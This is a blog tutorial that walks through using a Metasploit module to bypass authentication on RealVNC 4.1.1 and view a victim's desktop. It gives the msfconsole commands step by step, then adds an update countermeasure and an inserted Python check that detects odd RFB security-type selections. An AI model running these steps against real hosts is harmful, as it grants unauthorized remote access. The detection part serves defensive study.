5 Simple Steps Bypass Real VNC Authentication


Type : Tutorial

Level : Easy

Victim O.S : Windows XP SP3

Victim Vulnerable Application : RealVNC 4.1.1

Attacker O.S : Backtrack 5 R1

While looking around the web and at the 1337day.com website, I saw a new remote exploit there for a Real VNC authentication bypass. securityfocus.com has already described this vulnerability here.

What is VNC? According to the RealVNC website at realvnc.com:

RealVNC provides remote administration control software which lets you see and interact with desktop applications across any network.

RealVNC is a lifesaver for system administrators who aren't too familiar with telnet or SSH, because they can see the desktop in real time. In short, RealVNC works much like Remote Desktop Connection.

Requirement :

1. Metasploit framework

Step By Step 5 Simple Steps Bypass Real VNC Authentication:

1. Open your terminal and type msfconsole command to go to your metasploit console.

2. Next, select the module you want to use: realvnc_41_bypass.

msf > use exploit/multi/vnc/realvnc_41_bypass

3. The main thing to remember is that this type of attack doesn't need a payload to be set up, because we're attacking and bypassing the VNC login; the result is the victim's desktop brought to our computer.

Let's view the available options by running the show options command:

[Screenshot: Real VNC Authentication Bypass Step by Step Tutorial]

Information :

autovnc --> automatically launch the VNC viewer

lport --> our local VNC viewer port (port 5900 is the default)

rhost --> target machine (victim computer)

rport --> target port on the victim machine (port 5900 is the default)

4. Set the target using the RHOST option.

msf  auxiliary(realvnc_41_bypass) > set rhost
rhost =>

5. Everything is set up at this point, so the final step is to run the exploit command.

[Screenshot: Real VNC Authentication Bypass Step by Step Tutorial]

Along with the output generated by that script, we also get the victim's screen in our local VNC viewer.

[Screenshot: Real VNC Authentication Bypass Step by Step Tutorial]

Yes, we're in!

Countermeasures :

1. Update your VNC to a newer version; as you can see at the securityfocus.com link above, the newest version is not vulnerable.
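
To complement the update advice, here is a passive check a defender can run over captured VNC traffic (an added example, not part of the original post). In RFB 3.7/3.8 the client must choose its security type from the list the server offered, so a selection outside that list is a protocol violation worth alerting on. The function names, verdict strings and sample bytes are constructed for illustration, and the check assumes a bypass attempt shows up as such a violation.

```python
import re

SEC_NAMES = {1: "None", 2: "VNC Authentication"}  # security types defined by RFB
VERSION_RE = re.compile(rb"RFB (\d{3})\.(\d{3})\n")


def parse_version(msg: bytes) -> tuple:
    """Parse the 12-byte ProtocolVersion message, e.g. b'RFB 003.008\\n'."""
    m = VERSION_RE.fullmatch(msg)
    if not m:
        raise ValueError(f"not an RFB ProtocolVersion message: {msg!r}")
    return int(m.group(1)), int(m.group(2))


def audit_handshake(server: bytes, client: bytes) -> dict:
    """Check the start of one captured session; each argument is the
    reassembled byte stream of one direction (hypothetical helper)."""
    if len(server) < 13 or len(client) < 12:
        raise ValueError("capture too short for the RFB handshake")
    version = min(parse_version(server[:12]), parse_version(client[:12]))
    if version < (3, 7):
        # RFB 3.3: the server dictates the security type, nothing to compare.
        return {"version": version, "verdict": "not-applicable"}
    count = server[12]                      # number of offered security types
    offered = list(server[13:13 + count])
    if len(offered) != count or len(client) < 13:
        raise ValueError("capture ends before the security type is selected")
    selected = client[12]                   # the client's one-byte choice
    verdict = "ok" if selected in offered else "ALERT"
    return {
        "version": version,
        "offered": [SEC_NAMES.get(t, str(t)) for t in offered],
        "selected": SEC_NAMES.get(selected, str(selected)),
        "verdict": verdict,
    }


# Constructed captures (not from the post): the server offers only type 2.
SERVER = b"RFB 003.008\n" + bytes([1, 2])
NORMAL_CLIENT = b"RFB 003.008\n" + bytes([2])
ODD_CLIENT = b"RFB 003.008\n" + bytes([1])  # selects a type never offered

if __name__ == "__main__":
    for name, cli in (("normal", NORMAL_CLIENT), ("odd", ODD_CLIENT)):
        print(name, audit_handshake(SERVER, cli))
```

An "ALERT" verdict against a server that should require a password is a reason to check which VNC version that host is running.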

Hope you enjoyed it

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com
